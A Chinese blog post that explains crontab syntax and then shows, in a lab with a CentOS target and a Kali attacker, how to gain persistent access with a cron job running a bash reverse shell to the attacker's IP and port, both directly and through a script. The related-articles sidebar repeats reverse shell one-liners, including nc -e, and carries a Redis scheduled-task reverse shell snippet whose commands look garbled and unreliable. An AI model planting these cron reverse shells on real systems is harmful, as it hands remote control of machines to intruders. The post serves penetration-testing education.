linux定时计划反弹shell

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量2.1k 收藏 3
点赞数
分类专栏: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niqiu320/article/details/117304214
版权

crontab

crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。

安装(默认自带crontab)

yum -y install vixie-cron
yum -y install crontabs

说明:
vixie-cron 软件包是 cron 的主程序;
crontabs 软件包是用来安装、卸装、或列举用来驱动 cron 守护进程的表格的程序。

配置

cron 是 linux 的内置服务,但它不自动起来,可以用以下的方法启动、关闭这个服务:

service crond start     //启动服务
service crond stop      //关闭服务
service crond restart   //重启服务
service crond reload    //重新载入配置
service crond status    //查看crontab服务状态

前四行是用来配置 cron 任务运行环境的变量。
SHELL 变量的值告诉系统要使用哪个 shell 环境(在这个例子里是 bash shell);
PATH 变量定义用来执行命令的路径。
cron 任务的输出被邮寄给 MAILTO 变量定义的用户名。
如果 MAILTO 变量被定义为空白字符串(MAILTO=""),电子邮件就不会被寄出。
HOME 变量可以用来设置在执行命令或脚本时使用的主目录。

crontab 命令

功能:设置计时器。

语法:crontab[-u <用户名称>][配置文件] 或 crontab [-u <用户名称>][-elr]
解释:cron 是一个常驻服务,它提供计时器的功能,让用户在特定的时间得以执行预设的指令或程序。只要用户会编辑计时器的配置文件,就可以使 用计时器的功能。其配置文件格式如下:Minute Hour Day Month DayOFWeek Command

参数:
-e 编辑该用户的计时器设置。
-l 列出该用户的计时器设置。
-r 删除该用户的计时器设置。
-u<用户名称>  指定要设定计时器的用户名称。

格式:

*   *  *  *  *  command
分 时 日 月 周  命令

第1列表示分钟1~59 每分钟用*或者 */1表示
第2列表示小时1~23(0表示0点)
第3列表示日期1~31
第4列表示月份1~12
第5列标识号星期0~6(0表示星期天)
第6列要运行的命令

例子:

*/5 * * * * root ab -n 2000 http://60.217.229.252/250k.jpg
上面例子表示每5分钟模拟用户访问http://60.217.229.252/250k.jpg 2000次

30 21 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每晚的21:30重启apache。

45 4 1,10,22 * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每月1、10、22日的4 : 45重启apache。

10 1 * * 6,0 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每周六、周日的1 : 10重启apache。

0,30 18-23 * * * /usr/local/etc/rc.d/lighttpd restart
上面的例子表示在每天18 : 00至23 : 00之间每隔30分钟重启apache。

0 23 * * 6 /usr/local/etc/rc.d/lighttpd restart
上面的例子表示每星期六的11 : 00 pm重启apache。

* */1 * * * /usr/local/etc/rc.d/lighttpd restart
每一小时重启apache

* 23-7/1 * * * /usr/local/etc/rc.d/lighttpd restart
晚上11点到早上7点之间,每隔一小时重启apache

0 11 4 * mon-wed /usr/local/etc/rc.d/lighttpd restart
每月的4号与每周一到周三的11点重启apache

0 4 1 jan * /usr/local/etc/rc.d/lighttpd restart
一月一号的4点重启apache

*/30 * * * * /usr/sbin/ntpdate 210.72.145.44
每半小时同步一下时间

反弹shell

1.被攻击者:Centos 192.168.20.131

2.攻击者:kali 192.168.20.133

首先我们打开etc/crontab

在这里插入图片描述
可以看到shell=/bin/bash,这里不需要任何修改

方法一:

通过执行下面的语句,即可进入类似于vi的文本编辑器界面,我们可以通过在上面誊写上面那种时程表定时调用某个脚本。
在这里插入图片描述
写入bash

* * * * * bash -i >& /dev/tcp/192.168.20.133/8888  0>&1

注意这里必须是上面的软链接/bin/bash,如果其他的如:/bin/sh等要修改为bash
也可以不进行修改,写一个shell脚本,然后调用脚本

方法二:

1.创建shell文件
例如在/etc/crontabshell
vi crontabshell

#!/bin/bash
bash -i >& /dev/tcp/192.168.20.133/8888  0>&1

2.crontab -e
写入

* * * * * /etc/crontabshell

在这里插入图片描述
*为时间设置,具体自己随意设置即可

结果
在这里插入图片描述
成功反弹

香芋320
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5591
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1407
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
浅谈反弹shell
weixin_53284312的博客
01-12 2282
反弹shell
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 860
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2310
常用反弹shell技术汇总
利用定时任务提权
m0_65267037的博客
04-22 313
​ 我们在拿到shell之后,如果没有现成的内核提权exp可供使用的话,可以从他们的定时任务入手,看看有没有定时任务调用的脚本文件是我们的shell用户可以修改的,同时又是以 root 用户执行的,然后就可以修改之后静待反弹了。首先,我们需要先看有没有定时任务,然后,我们需要找到当前 shell 对哪些文件拥有 修改 的权限,这个文件还需要被定时任务执行,可以使用以下命令。这里我们利用的就是方式一,通过定时任务的文件,将自己的 公钥放入靶机的 authorized_keys 文件,实现攻击机的免密登录。
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
Linux使用shell脚本定时删除历史日志文件
09-14
主要介绍了Linux使用shell脚本定时删除历史日志文件,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
服务管理|反弹shell|计划任务|救援启动级别
过期的秋刀鱼
08-16 118
systemd是linux系统第一个运行的进程,用来创建系统的守护进程来管理整个linux系统。systemd取代init的一个优势就是他集合了丰富的功能,同时支持并行启动守护进程,使用起来方便。可以理解为systemd初始化整个系统所需的资源。systemd这个服务管理的后续服务,都是有配置⽂件的。修改完后关机重启,会发现系统不能正常启动,自动关机。开机以后让服务器,以字符界⾯显⽰。周期性计划任务配置⽂件。临时修改grub引导菜单。修改启动级别为图形界面。
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2474
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至。
12-29 1962
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5928
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
LINUX shell反弹篇(一)
胖虎的博客
10-26 2085
linuxshell反弹的方法及原理
Linux反弹Shell
m0_73199983的博客
03-06 1166
被控端主动发起连接请求连接控制,通常被控制端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收送过来的数据包。被控端bash -i>&/dev/tcp/192.168.81.154(控制端IP)/6666 (控制端想要开放的端口号)0>&1bash -i打开一个交互式的bash shell。>&或者&>>&、&>:混合输出(正确、错误的输出都输出到一个地方),将标准输出、错误输出全都重定向到 /dev/tcp/HOST/PORT,即控制端如果不想用>&或者。
带你了解LINUX反弹Shell的各种姿势(超详细)
xf555er的博客
11-27 1674
LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势。
CVE-2010-2816 复现+反弹shell
weixin_45695535的博客
05-03 1699
整体过程漏洞描述一、复现过程环境复现1.解密2.根据js找到加密逻辑反弹shell1.一句话木马方式2.计划任务反弹shell参考文章 漏洞描述 Adobe ColdFusion 是美国 Adobe 公司的一款动态 Web 服务器产品,其运行的 CFML(ColdFusion Markup Language)是针对 Web 应用的一种程序设计语言。 Adobe ColdFusion 8、9 版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 一、复现过程 环境 一台攻击机(kali-20
redis定时任务反弹shell
09-15
Redis定时任务反弹shell是一种利用Redis的计划任务功能来实现反弹shell的方法。通过在Redis中设置一个定时任务,当任务触发时,会执行相应的命令来反弹shell。 根据引用内容,可以使用Redis的计划任务反弹shell的步骤如下: 1. 首先,确保你已经安装了Redis,并且Redis服务器正常运行。 2. 在Redis配置文件(redis.conf)中启用计划任务功能。可以设置`lua-time-limit`参数为负数,以允许长时间运行的任务。 3. 创建一个Lua脚本,用于执行反弹shell的命令。可以使用`redis.call`函数来执行Redis命令,例如`redis.call('system', 'bash -i >& /dev/tcp/your_ip/your_port 0>&1')`。 4. 使用Redis的`EVAL`命令将Lua脚本加载到Redis中,并设置定时任务。可以使用`EVAL "return redis.call('config', 'set', 'notify-keyspace-events', 'Ex')" 0`命令来设置键空间通知事件,以便Redis能够触发计划任务。 5. 设置计划任务的触发条件和频率,例如可以使用`SET key value EX seconds NX`命令来设置一个键,当键不存在时才会触发定时任务。 6. 当定时任务触发时,Redis将执行Lua脚本中的命令,从而实现反弹shell的功能。 请注意,定时任务反弹shell可能涉及到安全风险,应谨慎操作并遵守法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值